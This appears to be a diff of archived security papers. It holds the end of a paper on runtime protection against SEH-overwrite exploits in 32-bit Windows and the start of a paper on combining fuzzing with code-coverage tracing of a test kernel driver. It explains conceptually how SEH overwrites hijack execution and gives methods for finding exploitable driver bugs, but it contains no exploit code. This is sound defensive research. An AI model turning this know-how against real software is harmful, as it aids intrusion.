would be to somehow layer very early on in the thread's execution -- perhaps
|
||||
even before it begins executing from its entry point. The author is aware of a
|
||||
good way to accomplish this, but it will be left as an exercise to the reader
|
||||
on what this might be. This more invasive solution is something that would be
|
||||
an easy and elegant way for Microsoft to include support for this, should they
|
||||
ever choose to do so.
|
||||
|
||||
The final matter of how to go about implementing this solution centers around
|
||||
how it could be deployed and used with existing applications without requiring
|
||||
a recompile. The easiest way to do this in a proof of concept setting would be
|
||||
to implement these protection mechanisms in the form of a DLL that can be
|
||||
dynamically loaded into the address space of a process that is to be protected.
|
||||
Once loaded, the DLL's DllMain can take care of getting everything set up. A
|
||||
simple way to cause the DLL to be loaded is through the use of AppInitDLLs,
|
||||
although this has some limitations. Alternatively, there are more invasive
|
||||
options that can be considered that will accomplish the goal of loading and
|
||||
initializing the DLL early on in process creation.
|
||||
|
||||
One interesting thing about this approach is that while it is targeted at being
|
||||
used as a runtime solution, it can also be used as a compile-time solution.
|
||||
This means that applications can use this solution at compile-time to protect
|
||||
themselves from SEH overwrites. Unlike Microsoft's solution, this will even
|
||||
protect them in the presence of third-party images that have not been compiled
|
||||
with the support. This can be accomplished through the use of a static library
|
||||
that uses TLS callbacks to receive notifications when threads are created, much
|
||||
like DllMain is used for DLL implementations of this solution.
|
||||
|
||||
All things considered, the author believes that the implementation described
|
||||
above, for all intents and purposes, is a fairly simplistic way of providing
|
||||
runtime protection against SEH overwrites that has minimal overhead. While the
|
||||
implementation described in this document is considered more suitable for a
|
||||
proof-of-concept or application-specific solution, there are real-world
|
||||
examples of more robust implementations, such as in Wehnus's WehnTrust product,
|
||||
a commercial side-project of the author's. Apologies for the shameless plug.
|
||||
|
||||
|
||||
5) Compatibility
|
||||
|
||||
Like most security solutions, there are always compatibility problems that must
|
||||
be considered. As it relates to the solution described in this paper, there
|
||||
are a couple of important things to keep in mind.
|
||||
|
||||
The first compatibility issue that might happen in the real world is a scenario
|
||||
where an application invalidates the exception handler chain in a legitimate
|
||||
fashion. The author is not currently aware of situations where an application
|
||||
would legitimately need to do this, but it has been observed that some
|
||||
applications, such as cygwin, will do funny things with the exception handler
|
||||
chain that are not likely to play nice with this form of protection. In the
|
||||
event that an application invalidates the exception handler chain, the solution
|
||||
described in this paper may inadvertently detect that an SEH overwrite has
|
||||
occurred simply because it is no longer able to reach the validation frame.
|
||||
|
||||
Another compatibility issue that may occur centers around the fact that the
|
||||
implementation described in this paper relies on the hooking of functions. In
|
||||
almost every situation it is a bad idea to use function hooking, but there are
|
||||
often situations where there is no alternative, especially in closed source
|
||||
environments. The use of function hooking can lead to compatibility problems
|
||||
with other applications that also hook ntdll!KiUserExceptionDispatcher. There
|
||||
may also be instances of security products that detect the hooking of
|
||||
ntdll!KiUserExceptionDispatcher and classify it as malware-like behavior. In
|
||||
any case, these compatibility concerns center less around the fundamental
|
||||
concept and more around the specific implementation that would be required of a
|
||||
third-party.
|
||||
|
||||
|
||||
6) Conclusion
|
||||
|
||||
Software-based vulnerabilities are a common problem that affect a wide array of
|
||||
operating systems. In some cases, these vulnerabilities can be exploited with
|
||||
greater ease depending on operating system specific features. One particular
|
||||
case of where this is possible is through the use of an SEH overwrite on 32-bit
|
||||
applications on the Windows platform. An SEH overwrite involves overwriting the
|
||||
Handler associated with an exception registration record. Once this occurs, an
|
||||
exception is generated that results in the overwritten Handler being called.
|
||||
As a result of this, the attacker can more easily gain control of code
|
||||
execution due to the context that the exception handler is called in.
|
||||
|
||||
Microsoft has attempted to address the problem of SEH overwrites with
|
||||
enhancements to the exception dispatcher itself and with solutions like SafeSEH
|
||||
and the /GS compiler flag. However, these solutions are limited because they
|
||||
require a recompilation of code and therefore only protect images that have
|
||||
been compiled with these flags enabled. This limitation is something that
|
||||
Microsoft is aware of and it was most likely chosen to reduce the potential for
|
||||
compatibility issues.
|
||||
|
||||
To help solve the problem of not offering complete protection against SEH
|
||||
overwrites, this paper has suggested a solution that can be used without any
|
||||
code recompilation and with negligible performance overhead. The solution
|
||||
involves appending a custom exception registration record, known as a
|
||||
validation frame, to the end of the exception list early on in thread startup.
|
||||
When an exception occurs in the context of a thread, the solution intercepts
|
||||
the exception and validates the exception handler chain for the thread by
|
||||
making sure that it can walk the chain until it reaches the validation frame.
|
||||
If it is able to reach the validation frame, then the exception is dispatched
|
||||
like normal. However, if the validation frame cannot be reached, then it is
|
||||
assumed that the exception handler chain is corrupt and that it's possible that
|
||||
an exploit attempt may have occurred. Since exception registration records are
|
||||
always prepended to the exception handler chain, the validation frame is
|
||||
guaranteed to always be the last handler.
|
||||
|
||||
This solution relies on the fact that when an SEH overwrite occurs, the Next
|
||||
attribute is overwritten before overwriting the Handler attribute. Due to the
|
||||
fact that attackers typically use the Next attribute as the location at which
|
||||
to store a short jump, it is not possible for them to both retain the integrity
|
||||
of the list and also use it as a location to store code. This important
|
||||
consequence is the key to being able to detect and prevent the leveraging of an
|
||||
SEH overwrite to gain code execution.
|
||||
|
||||
Looking toward the future, the usefulness of this solution will begin to wane
|
||||
as 64-bit versions of Windows begin to dominate the desktop environment. The
|
||||
reason 64-bit versions are not affected by this solution is because exception
|
||||
handling on 64-bit versions of Windows is inherently secure due to the way it's
|
||||
been implemented. However, this only applies to 64-bit binaries. Legacy
|
||||
32-bit binaries that are capable of running on 64-bit versions of Windows will
|
||||
continue to use the old style of exception handling, thus potentially leaving
|
||||
them vulnerable to the same style of attacks depending on what compiler flags
|
||||
were used. On the other hand, this solution will also become less necessary due
|
||||
to the fact that modern 32-bit x86 machines support hardware NX and can
|
||||
therefore help to mitigate the execution of code from the stack. Regardless of
|
||||
these facts, there will always be a legacy need to protect against SEH
|
||||
overwrites, and the solution described in this paper is one method of providing
|
||||
that protection.
|
||||
|
||||
A. References
|
||||
|
||||
Borland. United States Patent: 5628016.
|
||||
http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=2Fnetahtml2FPTO2Fsrchnum.htm&r=1&f=G&l=50&s1=5,628,016.PN.&OS=PN/5,628,016&RS=PN/5,628,016;
|
||||
accessed Sep 5, 2006.
|
||||
|
||||
|
||||
Litchfield, David. Defeating the Stack based Buffer
|
||||
Overflow Prevention Mechanism of Microsoft Windows 2003 Server.
|
||||
|
||||
http://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-litchfield.pdf;
|
||||
accessed Sep 5, 2006.
|
||||
|
||||
|
||||
Microsoft Corporation. Structured Exception Handling.
|
||||
|
||||
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/structured_exception_handling.asp;
|
||||
accessed Sep 5, 2006.
|
||||
|
||||
|
||||
Microsoft Corporation. Working with the AppInitDLLs
|
||||
registry value.
|
||||
|
||||
http://support.microsoft.com/default.aspx?scid=kb;en-us;197571;
|
||||
accessed Sep 5, 2006.
|
||||
|
||||
|
||||
Microsoft Corporation. /GS (Buffer Security Check)
|
||||
|
||||
http://msdn2.microsoft.com/en-us/library/8dbf701c.aspx;
|
||||
accessed Sep 5, 2006.
|
||||
|
||||
|
||||
Nagy, Ben. SEH (Structured Exception Handling) Security
|
||||
Changes in XPSP2 and 2003 SP1.
|
||||
|
||||
http://www.eeye.com/html/resources/newsletters/vice/VI20060830.html#vexposed;
|
||||
accessed Sep 8, 2006.
|
||||
|
||||
|
||||
Pietrek, Matt. A Crash Course on the Depths of Win32
|
||||
Structured Exception Handling.
|
||||
|
||||
http://www.microsoft.com/msj/0197/exception/exception.aspx;
|
||||
accessed Sep 8, 2006.
|
||||
|
||||
|
||||
skape. Improving Automated Analysis of Windows x64
|
||||
Binaries.
|
||||
http://www.uninformed.org/?v=4&a=1&t=sumry; accessed
|
||||
Sep 5, 2006.
|
||||
|
||||
|
||||
Wehnus. WehnTrust.
|
||||
http://www.wehnus.com/products.pl; accessed Sep 5,
|
||||
2006.
|
||||
|
||||
|
||||
Wikipedia. Matryoshka Doll.
|
||||
http://en.wikipedia.org/wiki/Matryoshka_doll;
|
||||
accessed Sep 18, 2006.
|
||||
|
||||
|
||||
Wine. CompilerExceptionSupport.
|
||||
http://wiki.winehq.org/CompilerExceptionSupport;
|
||||
accessed Sep 5, 2006.
|
||||
|
||||
|
||||
|
659
uninformed/5.3.txt
Normal file
659
uninformed/5.3.txt
Normal file
|
@ -0,0 +1,659 @@
|
|||
Effective Bug Discovery
|
||||
9/2006
|
||||
vf
|
||||
vf@nologin.org
|
||||
|
||||
|
||||
"If we knew what it was we were doing, it would not be
|
||||
called research, would it?"
|
||||
|
||||
- Albert Einstein
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: Sophisticated methods are currently being developed and
|
||||
implemented for mitigating the risk of exploitable bugs. The process of
|
||||
researching and discovering vulnerabilities in modern code will require
|
||||
changes to accommodate the shift in vulnerability mitigations. Code
|
||||
coverage analysis implemented in conjunction with fuzz testing reveals
|
||||
faults within a binary file that would have otherwise remained
|
||||
undiscovered by either method alone. This paper suggests a research
|
||||
method for more effective runtime binary analysis using the
|
||||
aforementioned strategy. This study presents empirical evidence that
|
||||
despite the fact that bug detection will become increasingly difficult
|
||||
in the future, analysis techniques have an opportunity to evolve
|
||||
intelligently.
|
||||
|
||||
Disclaimer: Practices and material presented within this paper are meant
|
||||
for educational purposes only. The author does not suggest using this
|
||||
information for methods which may be deemed unacceptable. The content in
|
||||
this paper is considered to be incomplete and unfinished, and therefore
|
||||
some information in this paper may be incorrect or inaccurate.
|
||||
Permission to make digital or hard copies of all or part of this work
|
||||
for personal or classroom use is granted without fee provided that
|
||||
copies are not made or distributed for profit or commercial advantage
|
||||
and that copies bear this notice and the full citation on the first
|
||||
page. To copy otherwise, to republish, requires prior specific
|
||||
permission.
|
||||
|
||||
Prerequisites: For an in-depth understanding of the concepts presented
|
||||
in this paper, a familiarity with Microsoft Windows device drivers,
|
||||
working with x86 assembler, debugging fundamentals, and the Windows
|
||||
kernel debugger is required. A brief introduction to the current state
|
||||
of code coverage analysis, including related uses, is introduced to
|
||||
support information presented within this paper. However, to implement
|
||||
the practices within this paper a deeper knowledge of aforementioned
|
||||
vulnerability discovery methods and methodologies are required. The
|
||||
following software and knowledge of its use is required to follow along
|
||||
with the discussion: IDAPro, Debugging tools for Windows, Debug Stalk,
|
||||
and a virtual machine such as VMware or Virtual PC.
|
||||
|
||||
Thanks: The author would like to thank west, icer, skape, Uninformed,
|
||||
and mom.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
|
||||
2.1) The status of vulnerability research
|
||||
|
||||
Researchers employ a myriad of investigative techniques in the quest for
|
||||
vulnerabilities. In any case, there exists no silver bullet for the
|
||||
discovery of security related software bugs, not to mention the fact
|
||||
that several new security oriented kernel-mode components have recently
|
||||
been integrated into Microsoft operating systems that can make
|
||||
vulnerability investigations more difficult. Vista, particularly on the
|
||||
64-bit edition, is integrating several mechanisms including driver
|
||||
signing, Secure Bootup using a TPM hardware chip, PatchGuard,
|
||||
kernel-mode integrity checks, and restricted user-mode access to . The
|
||||
Vista kernel also has an improved Low Fragmentation Heap and Address
|
||||
Space Layout Randomization. In later days, bugs were revealed via dumb
|
||||
fuzzing techniques, whereas this year more complicated bugs are
|
||||
indicating that knowledge of the format would require advanced
|
||||
understanding of a parser. Because of this, researchers are moving
|
||||
towards different discovery methods such as intelligent, rather than
|
||||
dumb, testing of drivers and applications.
|
||||
|
||||
|
||||
2.2) The problem with fuzzing
|
||||
|
||||
To compound the conception that these environments are becoming more
|
||||
difficult to test, monolithic black box fuzz testing, while frequently
|
||||
efficacious in its purpose, has a tendency for a exhibiting a lack of
|
||||
potency. The term ``monolithic'' is included as a reference to a
|
||||
comprehensive execution of the entire application or driver. Fuzzing is
|
||||
often executed in an environment where the tester does not know the
|
||||
internals of the binary in question. This leads to disadvantages in
|
||||
which a large number of tests must be executed to get an accurate
|
||||
estimate of binary's reliability. This investigation can be a daunting
|
||||
task if not implemented in a constructive manner. The test program and
|
||||
data selection should ensure independence from unrelated tests or groups
|
||||
of tests, thereby gaining the ability of complete coverage by reducing
|
||||
dependency on specific variables and their decision branching.
|
||||
|
||||
Another disadvantage of monolithic black box fuzz testing is that it is
|
||||
difficult to provide coverage analysis even though the testing selection
|
||||
may cover the entire suite of security testing models. A further
|
||||
complication in this nature of testing is of cyclic dependency causing
|
||||
cyclic arguments which in turn leads to a lessening of coverage
|
||||
assurance.
|
||||
|
||||
|
||||
2.3) Expectations
|
||||
|
||||
This paper aims to educate the reader on the espousal of code coverage
|
||||
analysis and fuzzing philosophy presented by researchers as a means to
|
||||
lighten the burden of bug detection. A kernel mode device driver will be
|
||||
fuzzed for bugs using a standard fuzzing method. Results from the
|
||||
initial fuzzing test will be examined to determine coverage. The fuzz
|
||||
testing method will be revised to accommodate coverage concerns and an
|
||||
execution graph is generated to view the results of the previous
|
||||
testing. A comparison is then made between the two prior testing
|
||||
methods, proving how effective code coverage analysis through kernel
|
||||
mode Stalking can improve fuzzing endeavors.
|
||||
|
||||
|
||||
3) QA
|
||||
|
||||
Before understanding how the methodologies presented in this paper can
|
||||
be used, a few simple definitions and descriptions are addressed for the
|
||||
benefit of the reader.
|
||||
|
||||
|
||||
3.1) What is code coverage?
|
||||
|
||||
Code coverage, as represented by a Control Flow Graph (CFG), is defined
|
||||
as a measure of the exercised code within a program undergoing software
|
||||
testing. For the purpose of vulnerability research, the goal is to
|
||||
utilize code coverage analysis to obtain an exhaustive execution of all
|
||||
possible paths through code and data flow that may be relevant for
|
||||
revealing failures. It is used as a good metric in determining how a
|
||||
specific set of tests can uncover numerous faults. Techniques of proper
|
||||
code coverage analysis presented in this paper utilize basic
|
||||
mathematical properties of graph theory by including elements such as
|
||||
vertices, links and edges. Graph theory has lain somewhat dormant until
|
||||
recently being utilized by computer scientists which have subsequently
|
||||
defined their own sets of vocabulary for the subject. For the sake of
|
||||
research continuity and to link mathematical to computer science
|
||||
definitions, the verbiage used within this paper will equate vertices to
|
||||
code blocks, branches to decisions, and edges to code paths.
|
||||
|
||||
To support our hypothesis, the aforementioned graph theory elements are
|
||||
compiled into CFGs. Informally, a Control Flow Graph is a directed graph
|
||||
composed of a finite set of vertices connected by edges indicating all
|
||||
possible routes a driver or application may take during execution. In
|
||||
other words, a CFG is merely blocks of code whose connected flow paths
|
||||
are determined by decisions. Block execution consists of a sequence of
|
||||
instructions which are free of branching or other control transfers
|
||||
except for the last instruction. These include branches or decisions
|
||||
which consist of Boolean expressions in a control structure. A path is a
|
||||
sequence of nodes traveled through by a series of uninterrupted links.
|
||||
Paths enable flow of information or data through code. In our case, a
|
||||
path is an execution flow and is therefore essential to measuring code
|
||||
coverage. Because of this factor, this investigation focuses directly on
|
||||
determining which paths have been traversed, which blocks and
|
||||
correlating data have been executed, and which links have been followed
|
||||
and finally applying it to fuzzing techniques.
|
||||
|
||||
The purpose of code coverage analysis is ultimately to require all
|
||||
control decisions to be exercised. In other words, the application
|
||||
needs to be executed thoroughly using enough inputs that all edges in
|
||||
the graph are traversed at least once. These graphs will be represented
|
||||
as diagrams in which blocks are squares, edges are lines, and paths are
|
||||
colored.
|
||||
|
||||
|
||||
4) Hypothesis: Code Coverage and Fuzzing
|
||||
|
||||
In the security arena, fuzzing has traditionally manifested potential
|
||||
security holes by throwing random garbage at a target, hoping that any
|
||||
given code path will fail in the process of consuming the aforementioned
|
||||
data. The possibility of execution flowing through a particular block in
|
||||
code is the sum of probabilities of the conditional branches leading to
|
||||
blocks. In simplicity, if there are areas of code that are never
|
||||
executed during typical fuzz testing, then administering code coverage
|
||||
methodologies will reveal those unexecuted branches. Graphical code
|
||||
coverage analysis using CFGs helps determine which code path has been
|
||||
executed even without the use of symbol tables. This process allows the
|
||||
tester to more easily identify branch execution, and to subsequently
|
||||
design fuzz testing methods to properly attain complete code coverage.
|
||||
Prior experiments driven at determining the effectiveness of code
|
||||
coverage techniques identify that ensuring branch execution coverage
|
||||
will improve the likelihood of discovery of binary faults.
|
||||
|
||||
|
||||
4.1) Process and Kernel Stalking
|
||||
|
||||
One of the more difficult questions to answer when testing software for
|
||||
vulnerabilities is: ``when is the testing considered finished?'' How do
|
||||
we, as vulnerability bug hunters, know when we have completed our
|
||||
testing cycle by exhausting all code paths and discovering all possible
|
||||
bugs? Because fuzz testing can easily be random, so unpredictable, the
|
||||
question of when to conclude testing is often left incomplete.
|
||||
|
||||
Pedram Amini, who recently released ``Paimei'', coined the term "Process
|
||||
Stalking" as a set of runtime binary analysis tools intended to enhance
|
||||
the visual effect of runtime analysis. His tool includes an IDA Pro
|
||||
plug-in paired with GML graph files for easy viewing. His strategy
|
||||
amalgamates the processes of runtime profiling through tracing and state
|
||||
mapping, which is a graphic model composed of behavior states of a
|
||||
binary. Pedram Amini's "Process Stalker" tool suite can be found on his
|
||||
personal website (http://pedram.redhive.com) and the reverse engineering
|
||||
website OpenRCE (http://www.openrce.org). -- might just use references
|
||||
or something. The fact that process stalker is used to reverse MS Update
|
||||
patches is irrelevant to the paper.
|
||||
|
||||
|
||||
4.2) Stalking and Fuzzing Go Hand in Hand
|
||||
|
||||
Process Stalker was transformed by an individual into a windbg extension
|
||||
for use in debugging user-mode and kernel-mode scenarios. This tool was
|
||||
given the title ``Debug Stalk,'' and until now this tool has remained
|
||||
unreleased. Process and Debug Stalker have overcome the static analysis
|
||||
visualization setback by implementing runtime binary analysis. Runtime
|
||||
analysis using Process and Debug Stalking in conjunction with
|
||||
mathematically enhanced CFGs exponentially improves the bug hunting
|
||||
mechanisms using fuzz techniques. Users can graphically determine via
|
||||
runtime analysis which paths have not been traversed and which blocks
|
||||
have not been executed. The user then has the opportunity to refine
|
||||
their testing approach to one that is more effective. When testing a
|
||||
large application, this technique dramatically reduces the overall
|
||||
workload of said scenarios. Therefore, iterations of the Process Stalk
|
||||
tool and the Debug Stalk tool will be used for investigating a faulty
|
||||
driver in this paper.
|
||||
|
||||
Debug Stalk is a Windows debugger plug-in that can be used in places
|
||||
where Process Stalking may not be suited, such as in a kernel-mode
|
||||
setting.
|
||||
|
||||
|
||||
5) Implementation
|
||||
|
||||
For the mere sake of simple illustration, several tools have been
|
||||
created for testing our code coverage theories. Some of the test cases
|
||||
have been exaggerated and are not real world examples. This testing
|
||||
implementation is broken down into three parts: Part I includes sending
|
||||
garbage to the device driver with dumb fuzzing; Part II will include
|
||||
smarter fuzzing; Part III is a breakdown of how an intelligent level of
|
||||
fuzzing helps improve code coverage while testing. First, a very simple
|
||||
device driver named pluto.sys was created for the purpose of this paper.
|
||||
It contains several blocks of code with decision based branching that
|
||||
will be fuzzed. The fuzzer will send iterations of random data to
|
||||
pluto.sys. After fuzzing has completed, a post-analysis tool will review
|
||||
executed code blocks within the driver. Part II will contain the same
|
||||
process as Part I, however, it will include an updated fuzzer based on
|
||||
our Part I post-analysis that will allow the driver to call into a
|
||||
previously unexecuted code region. Part III uses the data collected in
|
||||
Parts I and II as illustrative example of a proof of a beneficiary code
|
||||
coverage thesis.
|
||||
|
||||
|
||||
5.1) Stalking Setup
|
||||
|
||||
Several software components need to be acquired before Stalking can
|
||||
begin: the Debug Stalk extension, Pedram's Process Stalker, Python, and
|
||||
the GoVisual Diagram Editor (GDE). Pedram's Stalker is listed on both
|
||||
his blog and on the OpenRCE website. The Process Stalker contains files
|
||||
such as the IDA Pro plug-in, and Python scripts that generate the GML
|
||||
graph files that will be imported into GDE. GDE provides a functional
|
||||
mechanism for editing and positioning of graphs including clustered
|
||||
graphing, creation and deletion of nodes, zooming and scrolling,
|
||||
automatic graph layout. Components can be obtained at the following
|
||||
locations:
|
||||
|
||||
GDE: http://www.oreas.com/gde_en.php
|
||||
Python: http://www.python.org/download
|
||||
Proc Stalker: http://www.openrce.org/downloads/details/171/Process Stalker
|
||||
Debug Stalk: http://www.nologin.org/code
|
||||
|
||||
|
||||
5.2) Installing the Stalker
|
||||
|
||||
A walkthrough of installation for Process Stalker and required
|
||||
components will be covered briefly in this document, however, more
|
||||
detailed steps and descriptions are provided in Pedram's supporting
|
||||
manual. The .bpl file generated by the IDA plug-in will spit out a
|
||||
breakpoint list for entries within each block. The IDA plug-in
|
||||
processstalker.plw must be inserted into the IDA Pro plug-ins directory.
|
||||
Restarting IDA will allow the application to load the plug-in. A
|
||||
successful installation of the IDA plug-in in the log window will be
|
||||
similar to the following:
|
||||
|
||||
|
||||
[*] pStalker> Process Stalker – Profiler
|
||||
[*] pStalker> Pedram Amini <pedram.amini@gmail.com>
|
||||
[*] pStalker > Compiled on Sep 21 2006
|
||||
|
||||
|
||||
Generating a .bpl file can be started by pressing Alt+5 within the IDA
|
||||
application. A dialog appears. Make sure that ``Enable Instruction
|
||||
Colors,'' ``Enable Comments,'' and ``Allow Self Loops'' are all
|
||||
selected. Pressing OK will prompt for a ``Save as'' dialog. The .bpl
|
||||
file must be named relative to its given name. For example, if calc.exe
|
||||
is being watched, the file name must be calc.exe.bpl. In our case,
|
||||
pluto.sys is being watched, so the file name must be pluto.sys.bpl. A
|
||||
successful generation of a .bpl file will produce the following output
|
||||
in the log window:
|
||||
|
||||
|
||||
talker> Profile analysis 25% complete.
|
||||
[*] pStalker> Profile analysis 50% complete.
|
||||
[*] pStalker> Profile analysis 7% complete.
|
||||
[*] pStalker> Profile analysis 100% complete.
|
||||
|
||||
|
||||
Opening the pluto.sys.bpl file will show that records are colon
|
||||
delimited:
|
||||
|
||||
|
||||
pluto.sys:0000002e:0000002e
|
||||
pluto.sys:0000006a:0000006a
|
||||
pluto.sys:0000007c:0000007c
|
||||
|
||||
|
||||
5.3) Installing Debug Stalk
|
||||
|
||||
|
||||
The Debug Stalk extension can be built as follows. Open the Windows
|
||||
2003 Server Build Environment window. Set the DBGSDK_INC_PATH and
|
||||
DBGSDK_LIB_PATH environment variables to specify the paths to the
|
||||
debugger SDK headers and the debugger SDK libraries, respectively. If
|
||||
the SDK is installed at c:\WINDBGSDK, the following would work:
|
||||
|
||||
|
||||
set DBGSDK_INC_PATH=c:\WINDBGSDK\inc
|
||||
set DBGSDK_LIB_PATH=c:\WINDBGSDK\lib
|
||||
|
||||
|
||||
This may vary depending on where the SDK is installed. The directory
|
||||
name must not contain a space (' ') in its path. The next step is to
|
||||
change directories to the project directory. If Debug Stalk source
|
||||
code is placed within the samples directory within the SDK (located
|
||||
at c:\WINDBGSDK), then the following should work:
|
||||
|
||||
|
||||
cd c:\WINDBGSDK\samples\dbgstalk-0.0.18
|
||||
|
||||
|
||||
Typing build -cg at the command line to build the Debug Stalk project.
|
||||
Copy the dbgstalk.dll module from within this distribution to the root
|
||||
folder of the Debugging Tools for Windows root directory. This is the
|
||||
folder containing programs like cdb.exe and windbg.exe. If you have a
|
||||
default installation of "Debugging tools for Windows" already installed,
|
||||
the following should work:
|
||||
|
||||
|
||||
copy dbgstalk.dll "c:\Program Files\Debugging Tools for Windows\"
|
||||
|
||||
|
||||
The debugger plug-in should be installed at this point. It is important
|
||||
to note that Debug Stalk is a fairly new tool and has some reliability
|
||||
issues. It is a bit flakey and some hacking may be necessary in order to
|
||||
get it running properly.
|
||||
|
||||
|
||||
5.4) Stalking with Kernel Debug
|
||||
|
||||
|
||||
5.4.1) Part I
|
||||
|
||||
For testing purposes, a Microsoft Operating System needs to be set up
|
||||
inside of a Virtual PC environment. Load the pluto.sys driver inside of
|
||||
the Virtual PC and attach a debug session via Kernel Debug (kd). Once kd
|
||||
is loaded and attached to a process within the Virtual Machine, Debug
|
||||
Stalk can be invoked by calling "!dbgstalk.dbgstalk [switches] [.bpl
|
||||
file path]" at the kd console. For example:
|
||||
|
||||
|
||||
C:\Uninformed>kd -k com:port=\\.\pipe\woo,pipe
|
||||
|
||||
Microsoft (R) Windows Debugger Version 6.6.0007.5
|
||||
Copyright (c) Microsoft Corporation. All rights reserved.
|
||||
|
||||
Opened \\.\pipe\woo
|
||||
Waiting to reconnect...
|
||||
Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE
|
||||
Kernel Debugger connection established.
|
||||
Windows XP Kernel Version 2600 (Service Pack 2) UP Free x86 compatible
|
||||
Product: WinNt, suite: TerminalServer SingleUserTS
|
||||
Built by: 2600.xpsp_sp2_rtm.040803-2158
|
||||
Kernel base = 0x804d7000 PsLoadedModuleList = 0x8055ab20
|
||||
Debug session time: Sat Sep 23 14:40:24.522 2006 (GMT-7)
|
||||
System Uptime: 0 days 0:06:50.610
|
||||
Break instruction exception - code 80000003 (first chance)
|
||||
nt!DbgBreakPointWithStatus+0x4:
|
||||
804e3b25 cc int 3
|
||||
kd> .reload
|
||||
Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE
|
||||
Loading Kernel Symbols
|
||||
.......................................................
|
||||
Loading User Symbols
|
||||
|
||||
Loading unloaded module list
|
||||
...........
|
||||
kd> !dbgstalk.dbgstalk -o -b c:\Uninformed\pluto.sys.bpl
|
||||
[*] - Entering Stalker
|
||||
[*] - Break Point List.....: c:\Uninformed\pluto.sys.bpl
|
||||
[*] - Breakpoint Restore...: OFF
|
||||
[*] - Register Enumerate...: ON
|
||||
[*] - Kernel Stalking:.....: ON
|
||||
|
||||
current context:
|
||||
|
||||
eax=00000001 ebx=ffdff980 ecx=8055192c edx=000003f8 esi=00000000 edi=f4be2de0
|
||||
eip=804e3b25 esp=80550830 ebp=80550840 iopl=0 nv up ei pl nz na po nc
|
||||
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202
|
||||
nt!RtlpBreakWithStatusInstruction:
|
||||
804e3b25 cc int 3
|
||||
|
||||
commands:
|
||||
|
||||
[m] module list [0-9] enter recorder modes
|
||||
[x] stop recording [v] toggle verbosity
|
||||
[q] quit/close
|
||||
|
||||
|
||||
Once Debug Stalk is loaded, a list of commands is available to the user. A
|
||||
breakdown of the command line options offered by Debug Stalk is as follows:
|
||||
|
||||
|
||||
[m] module list
|
||||
[0-9] enter recorder modes
|
||||
[x] stop recording
|
||||
[v] toggle verbosity
|
||||
[q] quit/close
|
||||
|
||||
|
||||
At this point, the fuzz tool needs to be executed to send random arbitrary data
|
||||
to the device driver. While the fuzzer is running, Debug Stalk will print out
|
||||
information to kd. Pressing 'g' at the command line prompt will resume
|
||||
execution of the target machine. This invocation will look something like
|
||||
this:
|
||||
|
||||
|
||||
kd> g
|
||||
[*] - Recorder Opened......: pluto.sys.0
|
||||
[*] - Recorder Opened......: pluto.sys-regs.0
|
||||
Modload: Processing breakpoints for module pluto.sys at f7a7f000
|
||||
Modload: Done. 46 of 46 breakpoints were set.
|
||||
0034c883 T:00000001 [bp] f7a83000 a10020a8f7 mov eax,dword ptr [pluto+0x3000 (f7a82000)]
|
||||
0034ed70 T:00000001 [bp] f7a8300e 3bc1 cmp eax,ecx
|
||||
0034eded T:00000001 [bp] f7a83012 a12810a8f7 mov eax,dword ptr [pluto+0x2028 (f7a81028)]
|
||||
0034ee89 T:00000001 [bp] f7a8302b e9aed1ffff jmp pluto+0x11de (f7a801de)
|
||||
0034ef16 T:00000001 [bp] f7a801de 55 push ebp
|
||||
0034ef93 T:00000001 [bp] f7a80219 8b45fc mov eax,dword ptr [ebp-4]
|
||||
0034f03f T:00000001 [bp] f7a80253 6844646b20 push 206B6444h
|
||||
0034f0cb T:00000001 [bp] f7a802a2 b980000000 mov ecx,80h
|
||||
0034f148 T:00000001 [bp] f7a802ab 5f pop edi
|
||||
00359086 T:00000001 [bp] f7a8006a 8b4c2408 mov ecx,dword ptr [esp+8]
|
||||
0035920c T:00000001 [bp] f7a800f6 833d0420a8f700 cmp dword ptr [pluto+0x3004 (f7a82004)],0
|
||||
003592a9 T:00000001 [bp] f7a8010c 8b7760 mov esi,dword ptr [edi+60h]
|
||||
00359345 T:00000001 [bp] f7a80114 8b4704 mov eax,dword ptr [edi+4]
|
||||
003593e1 T:00000001 [bp] f7a80122 6a10 push 10h
|
||||
0035945e T:00000001 [bp] f7a80133 85c0 test eax,eax
|
||||
003594eb T:00000001 [bp] f7a80147 ff7604 push dword ptr [esi+4]
|
||||
00359587 T:00000001 [bp] f7a80176 8bcf mov ecx,edi
|
||||
00359614 T:00000001 [bp] f7a80182 5f pop edi
|
||||
0035ac5b T:00000001 [bp] f7a8002e 55 push ebp
|
||||
|
||||
current context:
|
||||
|
||||
eax=00000001 ebx=0000c271 ecx=8055192c edx=000003f8 esi=00000001 edi=291f0c30
|
||||
eip=804e3b25 esp=80550830 ebp=80550840 iopl=0 nv up ei pl nz na po nc
|
||||
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202
|
||||
nt!RtlpBreakWithStatusInstruction:
|
||||
804e3b25 cc int 3
|
||||
|
||||
|
||||
commands:
|
||||
|
||||
[m] module list [0-9] enter recorder modes
|
||||
[x] stop recording [v] toggle verbosity
|
||||
[q] quit/close
|
||||
|
||||
kd> q
|
||||
[*] - Exiting Stalker
|
||||
q
|
||||
|
||||
|
||||
Debug Stalk has finished Stalking the points in the driver allowed by the
|
||||
fuzzer. Files named "pluto.sys.0," "pluto.sys-regs.0 (optional)," have been
|
||||
saved to the current working directory.
|
||||
|
||||
|
||||
5.5) Analyzing the output
|
||||
|
||||
Pedram has developed a set of Python scripts to support the .bpl and recorder
|
||||
output file, such as adding register metadata to the graph, filtering generated
|
||||
breakpoint lists, additional GDE support for difficult graphs, combining
|
||||
multi-function graphs into a conglomerate graph, highlighting interesting
|
||||
blocks, importing back into the IDA changes made directly to the graph, adding
|
||||
function offsets to breakpoint addresses and optionally rebasing the recording
|
||||
addresses, and much more. Pedram provides detailed descriptions and usage of
|
||||
his python scripts in his manual. The Python scripts used for formatting the
|
||||
.gml files (for block based coverage) are psprocessrecording and
|
||||
psviewrecordingfuncs. The psprocessrecording script is executed first on the
|
||||
pluto.sys.0 which will produce another file called
|
||||
